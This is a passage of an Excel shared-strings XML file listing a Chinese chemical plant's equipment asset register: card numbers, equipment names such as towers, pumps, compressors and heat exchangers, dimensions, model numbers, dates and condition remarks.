    <t>2009.06.01</t>
  </si>
  <si>
    <t>01795</t>
  </si>
  <si>
    <t>硫铵吸收塔</t>
  </si>
  <si>
    <t>2*12</t>
  </si>
  <si>
    <t>01796</t>
  </si>
  <si>
    <t>316L1</t>
  </si>
  <si>
    <t>2009.04.01</t>
  </si>
  <si>
    <t>二个已合成一个</t>
  </si>
  <si>
    <t>01797</t>
  </si>
  <si>
    <t>316L2</t>
  </si>
  <si>
    <t>φ3000×1300</t>
  </si>
  <si>
    <t>01798</t>
  </si>
  <si>
    <t>刮刀离心机</t>
  </si>
  <si>
    <t>φ1800×8000</t>
  </si>
  <si>
    <t>不锈钢</t>
  </si>
  <si>
    <t>01799</t>
  </si>
  <si>
    <t>小母液罐</t>
  </si>
  <si>
    <t>3000×9000×1700</t>
  </si>
  <si>
    <t>01801</t>
  </si>
  <si>
    <t>GK800-N</t>
  </si>
  <si>
    <t>01802</t>
  </si>
  <si>
    <t>操作平台</t>
  </si>
  <si>
    <t>01803</t>
  </si>
  <si>
    <t>3000×9000×2300</t>
  </si>
  <si>
    <t>01804</t>
  </si>
  <si>
    <t>凉水塔</t>
  </si>
  <si>
    <t>SK-6</t>
  </si>
  <si>
    <t>01805</t>
  </si>
  <si>
    <t>吸滤槽</t>
  </si>
  <si>
    <t>30000×4000</t>
  </si>
  <si>
    <t>01806</t>
  </si>
  <si>
    <t>搪玻璃钢罐</t>
  </si>
  <si>
    <t>IS6550160</t>
  </si>
  <si>
    <t>01807</t>
  </si>
  <si>
    <t>硫酸计量槽</t>
  </si>
  <si>
    <t>DN</t>
  </si>
  <si>
    <t>其中一个已拆</t>
  </si>
  <si>
    <t>01808</t>
  </si>
  <si>
    <t>大母液罐</t>
  </si>
  <si>
    <t>φ2200×1400</t>
  </si>
  <si>
    <t>01810</t>
  </si>
  <si>
    <t>提升机</t>
  </si>
  <si>
    <t>φ1000×1500</t>
  </si>
  <si>
    <t>01811</t>
  </si>
  <si>
    <t>天车</t>
  </si>
  <si>
    <t>3T</t>
  </si>
  <si>
    <t>坏</t>
  </si>
  <si>
    <t>01812</t>
  </si>
  <si>
    <t>玻璃钢管</t>
  </si>
  <si>
    <t>3000×6350×2050</t>
  </si>
  <si>
    <t>废</t>
  </si>
  <si>
    <t>01813</t>
  </si>
  <si>
    <t>电子秤</t>
  </si>
  <si>
    <t>6m</t>
  </si>
  <si>
    <t>01814</t>
  </si>
  <si>
    <t>盘式干燥器</t>
  </si>
  <si>
    <t>1T</t>
  </si>
  <si>
    <t>带喂料器  提升机</t>
  </si>
  <si>
    <t>01816</t>
  </si>
  <si>
    <t>雷蒙磨</t>
  </si>
  <si>
    <t>XK3190-A12E+</t>
  </si>
  <si>
    <t>01820</t>
  </si>
  <si>
    <t>水、氨酸气管线</t>
  </si>
  <si>
    <t>铁质</t>
  </si>
  <si>
    <t>01821</t>
  </si>
  <si>
    <t>配电及线路</t>
  </si>
  <si>
    <t>GGD低压</t>
  </si>
  <si>
    <t>01822</t>
  </si>
  <si>
    <t>01823</t>
  </si>
  <si>
    <t>螺旋输送器</t>
  </si>
  <si>
    <t>01824</t>
  </si>
  <si>
    <t>白度计</t>
  </si>
  <si>
    <t>01825</t>
  </si>
  <si>
    <t>氰尿酸管</t>
  </si>
  <si>
    <t>φ1600×6000</t>
  </si>
  <si>
    <t>2010.10.10</t>
  </si>
  <si>
    <t>01826</t>
  </si>
  <si>
    <t>蒸汽流量计</t>
  </si>
  <si>
    <t xml:space="preserve">2420×863mm   </t>
  </si>
  <si>
    <t>2010.11.01</t>
  </si>
  <si>
    <t>01827</t>
  </si>
  <si>
    <t>大氰尿酸罐</t>
  </si>
  <si>
    <t>WSB-2    01784</t>
  </si>
  <si>
    <t>2011.01.01</t>
  </si>
  <si>
    <t>与01784改造</t>
  </si>
  <si>
    <t>01828</t>
  </si>
  <si>
    <t>吸尘斗</t>
  </si>
  <si>
    <t>01834</t>
  </si>
  <si>
    <t>监控设备</t>
  </si>
  <si>
    <t>2011.01.07</t>
  </si>
  <si>
    <t>01843</t>
  </si>
  <si>
    <t>热解炉窑</t>
  </si>
  <si>
    <t>70米4条</t>
  </si>
  <si>
    <t>2012.03.13</t>
  </si>
  <si>
    <t>01844</t>
  </si>
  <si>
    <t>运料车</t>
  </si>
  <si>
    <t>01845</t>
  </si>
  <si>
    <t>油压系统及配电</t>
  </si>
  <si>
    <t>01846</t>
  </si>
  <si>
    <t>火焰监测器</t>
  </si>
  <si>
    <t>01847</t>
  </si>
  <si>
    <t>01848</t>
  </si>
  <si>
    <t>01849</t>
  </si>
  <si>
    <t>氨风机</t>
  </si>
  <si>
    <t>01850</t>
  </si>
  <si>
    <t>余热风机</t>
  </si>
  <si>
    <t>250*399型</t>
  </si>
  <si>
    <t>01851</t>
  </si>
  <si>
    <t>3R93型</t>
  </si>
  <si>
    <t>01852</t>
  </si>
  <si>
    <t>母液槽</t>
  </si>
  <si>
    <t>Y5-478c右90.316l</t>
  </si>
  <si>
    <t>玻璃钢3.5*3  3.2*1.5</t>
  </si>
  <si>
    <t>01853</t>
  </si>
  <si>
    <t>废硫酸储槽</t>
  </si>
  <si>
    <t>Y5-479c右90</t>
  </si>
  <si>
    <t>2012.03.14</t>
  </si>
  <si>
    <t>玻璃钢80方</t>
  </si>
  <si>
    <t>01854</t>
  </si>
  <si>
    <t>￠2400*11570</t>
  </si>
  <si>
    <t>玻璃钢50方</t>
  </si>
  <si>
    <t>01855</t>
  </si>
  <si>
    <t>废硫酸罐</t>
  </si>
  <si>
    <t>01856</t>
  </si>
  <si>
    <t>硫铵操作台</t>
  </si>
  <si>
    <t>2400*2000</t>
  </si>
  <si>
    <t>01857</t>
  </si>
  <si>
    <t>2600*3000</t>
  </si>
  <si>
    <t>01858</t>
  </si>
  <si>
    <t>硫化床</t>
  </si>
  <si>
    <t>￠3600*8470</t>
  </si>
  <si>
    <t>含风机2台</t>
  </si>
  <si>
    <t>01859</t>
  </si>
  <si>
    <t>尾气排放、水汽排空烟筒</t>
  </si>
  <si>
    <t>01860</t>
  </si>
  <si>
    <t>硫铵循环泵</t>
  </si>
  <si>
    <t>316l</t>
  </si>
  <si>
    <t>01861</t>
  </si>
  <si>
    <t>10T/3T</t>
  </si>
  <si>
    <t>01862</t>
  </si>
  <si>
    <t>反应釜</t>
  </si>
  <si>
    <t>F10000L</t>
  </si>
  <si>
    <t>01863</t>
  </si>
  <si>
    <t>煮料罐（含搅拌）</t>
  </si>
  <si>
    <t>MZAO050-2314A</t>
  </si>
  <si>
    <t>01864</t>
  </si>
  <si>
    <t>LH10/3T-6.75M-12M地操</t>
  </si>
  <si>
    <t>01865</t>
  </si>
  <si>
    <t>玻璃钢液下泵</t>
  </si>
  <si>
    <t>01866</t>
  </si>
  <si>
    <t>01867</t>
  </si>
  <si>
    <t>废酸槽</t>
  </si>
  <si>
    <t>SK-12</t>
  </si>
  <si>
    <t>01868</t>
  </si>
  <si>
    <t>65FYS-40</t>
  </si>
  <si>
    <t>01869</t>
  </si>
  <si>
    <t>85FYS-38</t>
  </si>
  <si>
    <t>01870</t>
  </si>
  <si>
    <t>废酸罐</t>
  </si>
  <si>
    <t>2400*2500</t>
  </si>
  <si>
    <t>01871</t>
  </si>
  <si>
    <t>配浆槽</t>
  </si>
  <si>
    <t>2600*2500</t>
  </si>
  <si>
    <t>01872</t>
  </si>
  <si>
    <t>洗水槽</t>
  </si>
  <si>
    <t>3.5*1.5  3个   2.5*1.8  1个</t>
  </si>
  <si>
    <t>01873</t>
  </si>
  <si>
    <t>￠4000*8900</t>
  </si>
  <si>
    <t>01874</t>
  </si>
  <si>
    <t>单螺旋输送机</t>
  </si>
  <si>
    <t>01875</t>
  </si>
  <si>
    <t>斗提机</t>
  </si>
  <si>
    <t>￠3200*1501</t>
  </si>
  <si>
    <t>01876</t>
  </si>
  <si>
    <t>氰尿酸尿酸离心机</t>
  </si>
  <si>
    <t>CZ80-160</t>
  </si>
  <si>
    <t>01877</t>
  </si>
  <si>
    <t>盘干机</t>
  </si>
  <si>
    <t>直径219材质304+Q235</t>
  </si>
  <si>
    <t>01878</t>
  </si>
  <si>
    <t>振动筛</t>
  </si>
  <si>
    <t>材质304+Q235</t>
  </si>
  <si>
    <t>河南新乡</t>
  </si>
  <si>
    <t>01879</t>
  </si>
  <si>
    <t>汽包</t>
  </si>
  <si>
    <t>GK1250-N</t>
  </si>
  <si>
    <t>01880</t>
  </si>
  <si>
    <t>GDPG2200/10B</t>
  </si>
  <si>
    <t>01881</t>
  </si>
  <si>
    <t>硫酸液位槽</t>
  </si>
  <si>
    <t>HH-1500-1S</t>
  </si>
  <si>
    <t>01882</t>
  </si>
  <si>
    <t>S315</t>
  </si>
  <si>
    <t>01883</t>
  </si>
  <si>
    <t>逆流式玻璃钢冷却塔</t>
  </si>
  <si>
    <t>01885</t>
  </si>
  <si>
    <t>监控安装</t>
  </si>
  <si>
    <t>01886</t>
  </si>
  <si>
    <t>GFNL-200流量200㎡/h</t>
  </si>
  <si>
    <t>2012.03.15</t>
  </si>
  <si>
    <t>01887</t>
  </si>
  <si>
    <t>冷却水罐</t>
  </si>
  <si>
    <t>01888</t>
  </si>
  <si>
    <t>料槽</t>
  </si>
  <si>
    <t>01889</t>
  </si>
  <si>
    <t>01890</t>
  </si>
  <si>
    <t>漏斗</t>
  </si>
  <si>
    <t>01891</t>
  </si>
  <si>
    <t>316</t>
  </si>
  <si>
    <t>01893</t>
  </si>
  <si>
    <t>热水罐</t>
  </si>
  <si>
    <t>DN   2*3</t>
  </si>
  <si>
    <t>铝皮保温</t>
  </si>
  <si>
    <t>01894</t>
  </si>
  <si>
    <t>电缆桥架</t>
  </si>
  <si>
    <t>01895</t>
  </si>
  <si>
    <t>硫铵洗气塔</t>
  </si>
  <si>
    <t>01896</t>
  </si>
  <si>
    <t>01897</t>
  </si>
  <si>
    <t>尿素料斗</t>
  </si>
  <si>
    <t>2012.03.24</t>
  </si>
  <si>
    <t>同1888</t>
  </si>
  <si>
    <t>01898</t>
  </si>
  <si>
    <t>硫铵离心机</t>
  </si>
  <si>
    <t>01926</t>
  </si>
  <si>
    <t>燃烧器</t>
  </si>
  <si>
    <t>01927</t>
  </si>
  <si>
    <t>裂解炉</t>
  </si>
  <si>
    <t>01964</t>
  </si>
  <si>
    <t>2013.04.30</t>
  </si>
  <si>
    <t>另加备用</t>
  </si>
  <si>
    <t>01998</t>
  </si>
  <si>
    <t>02037</t>
  </si>
  <si>
    <t>BRO.23/10M2</t>
  </si>
  <si>
    <t>2014.06.25</t>
  </si>
  <si>
    <t>02060</t>
  </si>
  <si>
    <t>玻璃钢锥罐</t>
  </si>
  <si>
    <t>∮1384*1000</t>
  </si>
  <si>
    <t>空压机</t>
  </si>
  <si>
    <t>卡片编号</t>
  </si>
  <si>
    <t>00279</t>
  </si>
  <si>
    <t>冷冻机</t>
  </si>
  <si>
    <t>8as17</t>
  </si>
  <si>
    <t>大连</t>
  </si>
  <si>
    <t>00280</t>
  </si>
  <si>
    <t>冰机</t>
  </si>
  <si>
    <t>8as 17</t>
  </si>
  <si>
    <t>00281</t>
  </si>
  <si>
    <t>32-250</t>
  </si>
  <si>
    <t>00286</t>
  </si>
  <si>
    <t>液氨贮槽</t>
  </si>
  <si>
    <t>184立方</t>
  </si>
  <si>
    <t>00392</t>
  </si>
  <si>
    <t>空气储罐</t>
  </si>
  <si>
    <t>φ2400×6742</t>
  </si>
  <si>
    <t>00393</t>
  </si>
  <si>
    <t>无油润滑压缩机</t>
  </si>
  <si>
    <t>2Z-6/8</t>
  </si>
  <si>
    <t>00394</t>
  </si>
  <si>
    <t>干燥装置</t>
  </si>
  <si>
    <t>F0711</t>
  </si>
  <si>
    <t>00395</t>
  </si>
  <si>
    <t>BR0.8-1.0-120E</t>
  </si>
  <si>
    <t>00396</t>
  </si>
  <si>
    <t>第一水加热器</t>
  </si>
  <si>
    <t>φ1000×8429</t>
  </si>
  <si>
    <t>00397</t>
  </si>
  <si>
    <t>BR0.8-1.0-80E</t>
  </si>
  <si>
    <t>00398</t>
  </si>
  <si>
    <t>饱和热水塔</t>
  </si>
  <si>
    <t>φ1628×11840</t>
  </si>
  <si>
    <t>00399</t>
  </si>
  <si>
    <t>低变炉</t>
  </si>
  <si>
    <t>f2400</t>
  </si>
  <si>
    <t>00400</t>
  </si>
  <si>
    <t>变换炉</t>
  </si>
  <si>
    <t>f3400</t>
  </si>
  <si>
    <t>00401</t>
  </si>
  <si>
    <t>蒸气分离过热器</t>
  </si>
  <si>
    <t>φ1400×4587</t>
  </si>
  <si>
    <t>00402</t>
  </si>
  <si>
    <t>流杆换热器</t>
  </si>
  <si>
    <t>1000*6520</t>
  </si>
  <si>
    <t>00403</t>
  </si>
  <si>
    <t>腐蚀器</t>
  </si>
  <si>
    <t>1000*8128</t>
  </si>
  <si>
    <t>00404</t>
  </si>
  <si>
    <t>IS200-15O-315</t>
  </si>
  <si>
    <t>00405</t>
  </si>
  <si>
    <t>50m2</t>
  </si>
  <si>
    <t>00406</t>
  </si>
  <si>
    <t>60m2</t>
  </si>
  <si>
    <t>00407</t>
  </si>
  <si>
    <t>IS150-125-200</t>
  </si>
  <si>
    <t>00408</t>
  </si>
  <si>
    <t>废热回收器</t>
  </si>
  <si>
    <t>186m2</t>
  </si>
  <si>
    <t>00409</t>
  </si>
  <si>
    <t>液氨贮松</t>
  </si>
  <si>
    <t>25立方</t>
  </si>
  <si>
    <t>00410</t>
  </si>
  <si>
    <t>油分离器</t>
  </si>
  <si>
    <t>f600*4532</t>
  </si>
  <si>
    <t>00411</t>
  </si>
  <si>
    <t>氨分离器</t>
  </si>
  <si>
    <t>f600*5890</t>
  </si>
  <si>
    <t>00412</t>
  </si>
  <si>
    <t>冷交换器</t>
  </si>
  <si>
    <t>f600*11793</t>
  </si>
  <si>
    <t>00413</t>
  </si>
  <si>
    <t>新鲜气油分</t>
  </si>
  <si>
    <t>f600*2730</t>
  </si>
  <si>
    <t>00414</t>
  </si>
  <si>
    <t>163.5平米</t>
  </si>
  <si>
    <t>00415</t>
  </si>
  <si>
    <t>循环机</t>
  </si>
  <si>
    <t>2.6立方米</t>
  </si>
  <si>
    <t>甲醇1台，化工1台</t>
  </si>
  <si>
    <t>00416</t>
  </si>
  <si>
    <t>软水加热器</t>
  </si>
  <si>
    <t>650*5821</t>
  </si>
  <si>
    <t>00417</t>
  </si>
  <si>
    <t>氨等压回收塔</t>
  </si>
  <si>
    <t>AHS-1600GL</t>
  </si>
  <si>
    <t>00418</t>
  </si>
  <si>
    <t>氨 冷器</t>
  </si>
  <si>
    <t>f1600</t>
  </si>
  <si>
    <t>00419</t>
  </si>
  <si>
    <t>水冷却器</t>
  </si>
  <si>
    <t>148平方米</t>
  </si>
  <si>
    <t>00420</t>
  </si>
  <si>
    <t>多极离心泵</t>
  </si>
  <si>
    <t>dg6-25*8</t>
  </si>
  <si>
    <t>3400变换</t>
  </si>
  <si>
    <t>00421</t>
  </si>
  <si>
    <t>800合成塔</t>
  </si>
  <si>
    <t>直径800*15971</t>
  </si>
  <si>
    <t>00422</t>
  </si>
  <si>
    <t>铜液泵</t>
  </si>
  <si>
    <t>6ty5-9/160</t>
  </si>
  <si>
    <t>00423</t>
  </si>
  <si>
    <t>3.5立方米</t>
  </si>
  <si>
    <t>00424</t>
  </si>
  <si>
    <t>净氨塔</t>
  </si>
  <si>
    <t>直径1200*2200</t>
  </si>
  <si>
    <t>00425</t>
  </si>
  <si>
    <t>铜分</t>
  </si>
  <si>
    <t>直径500x</t>
  </si>
  <si>
    <t>00426</t>
  </si>
  <si>
    <t>直径273*6000</t>
  </si>
  <si>
    <t>00427</t>
  </si>
  <si>
    <t>00428</t>
  </si>
  <si>
    <t>膜分离器</t>
  </si>
  <si>
    <t>直径100*3000</t>
  </si>
  <si>
    <t>00429</t>
  </si>
  <si>
    <t>直径245*3000</t>
  </si>
  <si>
    <t>00430</t>
  </si>
  <si>
    <t>3w-6bt2</t>
  </si>
  <si>
    <t>00432</t>
  </si>
  <si>
    <t>废铜液地下槽</t>
  </si>
  <si>
    <t>直径1000*2000</t>
  </si>
  <si>
    <t>00433</t>
  </si>
  <si>
    <t>铜液缓冲器</t>
  </si>
  <si>
    <t>直径800-1190</t>
  </si>
  <si>
    <t>00434</t>
  </si>
  <si>
    <t>化铜桶</t>
  </si>
  <si>
    <t>直径100*4300</t>
  </si>
  <si>
    <t>00435</t>
  </si>
  <si>
    <t>低压铜液泵</t>
  </si>
  <si>
    <t>IS380-65-160</t>
  </si>
  <si>
    <t>00436</t>
  </si>
  <si>
    <t>铜液贮槽</t>
  </si>
  <si>
    <t>φ2400*1700</t>
  </si>
  <si>
    <t>00438</t>
  </si>
  <si>
    <t>φ2800*16900</t>
  </si>
  <si>
    <t>00439</t>
  </si>
  <si>
    <t>φ1400研磨机</t>
  </si>
  <si>
    <t>00440</t>
  </si>
  <si>
    <t>脱硫罐</t>
  </si>
  <si>
    <t>f2200h7375</t>
  </si>
  <si>
    <t>移至造气</t>
  </si>
  <si>
    <t>00441</t>
  </si>
  <si>
    <t>油水分离器</t>
  </si>
  <si>
    <t>f1000h2550</t>
  </si>
  <si>
    <t>00442</t>
  </si>
  <si>
    <t>f2400h3208</t>
  </si>
  <si>
    <t>？</t>
  </si>
  <si>
    <t>00443</t>
  </si>
  <si>
    <t>大轴流风机</t>
  </si>
  <si>
    <t>00444</t>
  </si>
  <si>
    <t>玻璃钢风筒</t>
  </si>
  <si>
    <t>L-47</t>
  </si>
  <si>
    <t>00445</t>
  </si>
  <si>
    <t>电动式双梁起重机</t>
  </si>
  <si>
    <t>10t</t>
  </si>
  <si>
    <t>00446</t>
  </si>
  <si>
    <t>三入缓冲器</t>
  </si>
  <si>
    <t>φ500×6×1700</t>
  </si>
  <si>
    <t>00447</t>
  </si>
  <si>
    <t>水冷冷却器</t>
  </si>
  <si>
    <t>φ89×7</t>
  </si>
  <si>
    <t>00448</t>
  </si>
  <si>
    <t>风筒及网格</t>
  </si>
  <si>
    <t>00449</t>
  </si>
  <si>
    <t>l-47</t>
  </si>
  <si>
    <t>00461</t>
  </si>
  <si>
    <t>冷凝液槽</t>
  </si>
  <si>
    <t>直径1400*5150</t>
  </si>
  <si>
    <t>00481</t>
  </si>
  <si>
    <t>冷排</t>
  </si>
  <si>
    <t>直径108*4</t>
  </si>
  <si>
    <t>3400</t>
  </si>
  <si>
    <t>00482</t>
  </si>
  <si>
    <t>压缩机</t>
  </si>
  <si>
    <t>M40-148/314</t>
  </si>
  <si>
    <t>00483</t>
  </si>
  <si>
    <t>双梁起重机</t>
  </si>
  <si>
    <t>HT16-16.5</t>
  </si>
  <si>
    <t>00484</t>
  </si>
  <si>
    <t>辅机</t>
  </si>
  <si>
    <t>M40</t>
  </si>
  <si>
    <t>00485</t>
  </si>
  <si>
    <t>合成塔</t>
  </si>
  <si>
    <t>600</t>
  </si>
  <si>
    <t>00486</t>
  </si>
  <si>
    <t>冷交</t>
  </si>
  <si>
    <t>600*7683</t>
  </si>
  <si>
    <t>00487</t>
  </si>
  <si>
    <t>氨冷凝器</t>
  </si>
  <si>
    <t>F600</t>
  </si>
  <si>
    <t>00488</t>
  </si>
  <si>
    <t>废锅</t>
  </si>
  <si>
    <t>38.8平方米</t>
  </si>
  <si>
    <t>304</t>
  </si>
  <si>
    <t>00489</t>
  </si>
  <si>
    <t>氨分</t>
  </si>
  <si>
    <t>00490</t>
  </si>
  <si>
    <t>循环预热器</t>
  </si>
  <si>
    <t>F500</t>
  </si>
  <si>
    <t>00491</t>
  </si>
  <si>
    <t>折流杆换热器</t>
  </si>
  <si>
    <t>EC-1-94-75</t>
  </si>
  <si>
    <t>00492</t>
  </si>
  <si>
    <t>热交换器械</t>
  </si>
  <si>
    <t>直径1000*8428</t>
  </si>
  <si>
    <t>00494</t>
  </si>
  <si>
    <t>800*5000</t>
  </si>
  <si>
    <t>00495</t>
  </si>
  <si>
    <t>增温器</t>
  </si>
  <si>
    <t>1400*4500</t>
  </si>
  <si>
    <t>00498</t>
  </si>
  <si>
    <t>br-1000</t>
  </si>
  <si>
    <t>00500</t>
  </si>
  <si>
    <t>2800变换</t>
  </si>
  <si>
    <t>00501</t>
  </si>
  <si>
    <t>铜塔</t>
  </si>
  <si>
    <t>1000*1500p（1000*56*184000）</t>
  </si>
  <si>
    <t>塔铜洗</t>
  </si>
  <si>
    <t>00502</t>
  </si>
  <si>
    <t>铜液氨冷器</t>
  </si>
  <si>
    <t>90平米</t>
  </si>
  <si>
    <t>青岛通用</t>
  </si>
  <si>
    <t>00503</t>
  </si>
  <si>
    <t>氨水松</t>
  </si>
  <si>
    <t>800*1600</t>
  </si>
  <si>
    <t>冰机氢回收</t>
  </si>
  <si>
    <t>00504</t>
  </si>
  <si>
    <t>2400</t>
  </si>
  <si>
    <t>00505</t>
  </si>
  <si>
    <t>00506</t>
  </si>
  <si>
    <t>水加热器</t>
  </si>
  <si>
    <t>φ1000×12×8429</t>
  </si>
  <si>
    <t>00507</t>
  </si>
  <si>
    <t>KQL200/100-22/2</t>
  </si>
  <si>
    <t>00508</t>
  </si>
  <si>
    <t>12-sh-13</t>
  </si>
  <si>
    <t>00509</t>
  </si>
  <si>
    <t>铜液过滤器</t>
  </si>
  <si>
    <t>1100*1200</t>
  </si>
  <si>
    <t>00510</t>
  </si>
  <si>
    <t>12sh-9B</t>
  </si>
  <si>
    <t>00511</t>
  </si>
  <si>
    <t>中开泵</t>
  </si>
  <si>
    <t>12sh-13</t>
  </si>
  <si>
    <t>00565</t>
  </si>
  <si>
    <t>D型</t>
  </si>
  <si>
    <t>00578</t>
  </si>
  <si>
    <t>淋洒式水冷器</t>
  </si>
  <si>
    <t>φ83×15</t>
  </si>
  <si>
    <t>00581</t>
  </si>
  <si>
    <t>BRG-100M2</t>
  </si>
  <si>
    <t>00582</t>
  </si>
  <si>
    <t>循环气预热器换芯</t>
  </si>
  <si>
    <t>F=109M2</t>
  </si>
  <si>
    <t>00595</t>
  </si>
  <si>
    <t>280M2</t>
  </si>
  <si>
    <t>00596</t>
  </si>
  <si>
    <t>270M2</t>
  </si>
  <si>
    <t>00597</t>
  </si>
  <si>
    <t>板式换热气</t>
  </si>
  <si>
    <t>80M2</t>
  </si>
  <si>
    <t>00600</t>
  </si>
  <si>
    <t>变脱塔内件</t>
  </si>
  <si>
    <t>00602</t>
  </si>
  <si>
    <t>油冷却器</t>
  </si>
  <si>
    <t>GLL4-12、6.3</t>
  </si>
  <si>
    <t>00610</t>
  </si>
  <si>
    <t>单链刮板除渣机</t>
  </si>
  <si>
    <t>00618</t>
  </si>
  <si>
    <t>预腐蚀器</t>
  </si>
  <si>
    <t>03-1-22</t>
  </si>
  <si>
    <t>00621</t>
  </si>
  <si>
    <t>BLZO</t>
  </si>
  <si>
    <t>00624</t>
  </si>
  <si>
    <t>125平米</t>
  </si>
  <si>
    <t>00640</t>
  </si>
  <si>
    <t>主塔再沸器</t>
  </si>
  <si>
    <t>00642</t>
  </si>
  <si>
    <t>水冷器</t>
  </si>
  <si>
    <t>191平米</t>
  </si>
  <si>
    <t>00647</t>
  </si>
  <si>
    <t>MH92</t>
  </si>
  <si>
    <t>00659</t>
  </si>
  <si>
    <t>250S-39</t>
  </si>
  <si>
    <t>00687</t>
  </si>
  <si>
    <t>氮氢气压缩机</t>
  </si>
  <si>
    <t>MH-92/314</t>
  </si>
  <si>
    <t>00688</t>
  </si>
  <si>
    <t>过滤器</t>
  </si>
  <si>
    <t>1.5米</t>
  </si>
  <si>
    <t>00697</t>
  </si>
  <si>
    <t>M16压缩机冷排</t>
  </si>
  <si>
    <t>φ89×4.5</t>
  </si>
  <si>
    <t>00707</t>
  </si>
  <si>
    <t>BL1.0</t>
  </si>
  <si>
    <t>2004.02.28</t>
  </si>
  <si>
    <t>00711</t>
  </si>
  <si>
    <t>主塔蒸发器</t>
  </si>
  <si>
    <t>2004.03.30</t>
  </si>
  <si>
    <t>00713</t>
  </si>
  <si>
    <t>管芯</t>
  </si>
  <si>
    <t>MH114</t>
  </si>
  <si>
    <t>00737</t>
  </si>
  <si>
    <t>分汽缸</t>
  </si>
  <si>
    <t>φ700×10×2420</t>
  </si>
  <si>
    <t>00738</t>
  </si>
  <si>
    <t>2.3级油水分离器</t>
  </si>
  <si>
    <t>φ500×1740</t>
  </si>
  <si>
    <t>00739</t>
  </si>
  <si>
    <t>1.2级冷却器</t>
  </si>
  <si>
    <t>00740</t>
  </si>
  <si>
    <t>氮氢压缩机</t>
  </si>
  <si>
    <t>M180-314</t>
  </si>
  <si>
    <t>00746</t>
  </si>
  <si>
    <t>电焊机</t>
  </si>
  <si>
    <t>2X5-630</t>
  </si>
  <si>
    <t>00747</t>
  </si>
  <si>
    <t>250-140-96</t>
  </si>
  <si>
    <t>2004.07.27</t>
  </si>
  <si>
    <t>00763</t>
  </si>
  <si>
    <t>ISR80-65-160</t>
  </si>
  <si>
    <t>00764</t>
  </si>
  <si>
    <t>BR-0.8-A</t>
  </si>
  <si>
    <t>00777</t>
  </si>
  <si>
    <t>2x5-630</t>
  </si>
  <si>
    <t>2004.11.30</t>
  </si>
  <si>
    <t>00778</t>
  </si>
  <si>
    <t>180压缩机软启动</t>
  </si>
  <si>
    <t>M180</t>
  </si>
  <si>
    <t>00780</t>
  </si>
  <si>
    <t>齿轮泵</t>
  </si>
  <si>
    <t>ZCY400/0.63-2</t>
  </si>
  <si>
    <t>00796</t>
  </si>
  <si>
    <t>φ2200×5552</t>
  </si>
  <si>
    <t>00798</t>
  </si>
  <si>
    <t>煤气油分离器</t>
  </si>
  <si>
    <t>φ1800×5350</t>
  </si>
  <si>
    <t>00799</t>
  </si>
  <si>
    <t>冷激汽化器</t>
  </si>
  <si>
    <t>φ1600×10716</t>
  </si>
  <si>
    <t>00800</t>
  </si>
  <si>
    <t>主热交</t>
  </si>
  <si>
    <t>φ1600×14770</t>
  </si>
  <si>
    <t>00801</t>
  </si>
  <si>
    <t>焦碳过滤器</t>
  </si>
  <si>
    <t>φ2400×10144</t>
  </si>
  <si>
    <t>00802</t>
  </si>
  <si>
    <t>变换水分离器</t>
  </si>
  <si>
    <t>DN2200</t>
  </si>
  <si>
    <t>00803</t>
  </si>
  <si>
    <t>φ2400×10500</t>
  </si>
  <si>
    <t>00804</t>
  </si>
  <si>
    <t>φ2800×10144</t>
  </si>
  <si>
    <t>00805</t>
  </si>
  <si>
    <t>脱盐水罐</t>
  </si>
  <si>
    <t>φ800×3324</t>
  </si>
  <si>
    <t>00815</t>
  </si>
  <si>
    <t>双吸中开泵</t>
  </si>
  <si>
    <t>00816</t>
  </si>
  <si>
    <t>00836</t>
  </si>
  <si>
    <t>洗氨塔</t>
  </si>
  <si>
    <t>φ500×14040</t>
  </si>
  <si>
    <t>2011.08.24</t>
  </si>
  <si>
    <t>化工车间氢回收岗位</t>
  </si>
  <si>
    <t>00840</t>
  </si>
  <si>
    <t>3800</t>
  </si>
  <si>
    <t>00843</t>
  </si>
  <si>
    <t>锅炉给水泵（已改为离心泵）</t>
  </si>
  <si>
    <t>DJ25-39*9</t>
  </si>
  <si>
    <t>00845</t>
  </si>
  <si>
    <t>卧式水冷器</t>
  </si>
  <si>
    <t>400</t>
  </si>
  <si>
    <t>2005.06.08</t>
  </si>
  <si>
    <t>00846</t>
  </si>
  <si>
    <t>氨合成塔外筒</t>
  </si>
  <si>
    <t>1200/16</t>
  </si>
  <si>
    <t>00847</t>
  </si>
  <si>
    <t>1000/6.5</t>
  </si>
  <si>
    <t>00848</t>
  </si>
  <si>
    <t>00849</t>
  </si>
  <si>
    <t>1000/14M</t>
  </si>
  <si>
    <t>00850</t>
  </si>
  <si>
    <t>450</t>
  </si>
  <si>
    <t>00851</t>
  </si>
  <si>
    <t>废热锅炉</t>
  </si>
  <si>
    <t>186</t>
  </si>
  <si>
    <t>00852</t>
  </si>
  <si>
    <t>DN热交换器</t>
  </si>
  <si>
    <t>13.96M</t>
  </si>
  <si>
    <t>00853</t>
  </si>
  <si>
    <t>DIW12-6/295-320</t>
  </si>
  <si>
    <t>00860</t>
  </si>
  <si>
    <t>脱C管道泵</t>
  </si>
  <si>
    <t>KQW125-160A</t>
  </si>
  <si>
    <t>00906</t>
  </si>
  <si>
    <t>起重机</t>
  </si>
  <si>
    <t>00924</t>
  </si>
  <si>
    <t>φ400×2225</t>
  </si>
  <si>
    <t>00943</t>
  </si>
  <si>
    <t>φ273×6582</t>
  </si>
  <si>
    <t>00944</t>
  </si>
  <si>
    <t>四级分离器</t>
  </si>
  <si>
    <t>00945</t>
  </si>
  <si>
    <t>三级分离器</t>
  </si>
  <si>
    <t>φ500×12×2401</t>
  </si>
  <si>
    <t>00946</t>
  </si>
  <si>
    <t>90平方换热器</t>
  </si>
  <si>
    <t>90m2</t>
  </si>
  <si>
    <t>00951</t>
  </si>
  <si>
    <t>变换汽包</t>
  </si>
  <si>
    <t>φ1200×2600</t>
  </si>
  <si>
    <t>00952</t>
  </si>
  <si>
    <t>φ600×4015</t>
  </si>
  <si>
    <t>00981</t>
  </si>
  <si>
    <t>一段冷却分离器</t>
  </si>
  <si>
    <t>φ800×3868</t>
  </si>
  <si>
    <t>00982</t>
  </si>
  <si>
    <t>四段冷却分离器</t>
  </si>
  <si>
    <t>00989</t>
  </si>
  <si>
    <t>氨塔内件</t>
  </si>
  <si>
    <t>1200</t>
  </si>
  <si>
    <t>00990</t>
  </si>
  <si>
    <t>氨合成油分</t>
  </si>
  <si>
    <t>00991</t>
  </si>
  <si>
    <t>氨合成氨分</t>
  </si>
  <si>
    <t>00992</t>
  </si>
  <si>
    <t>合成冷交换器</t>
  </si>
  <si>
    <t>00993</t>
  </si>
  <si>
    <t>热交换器内件</t>
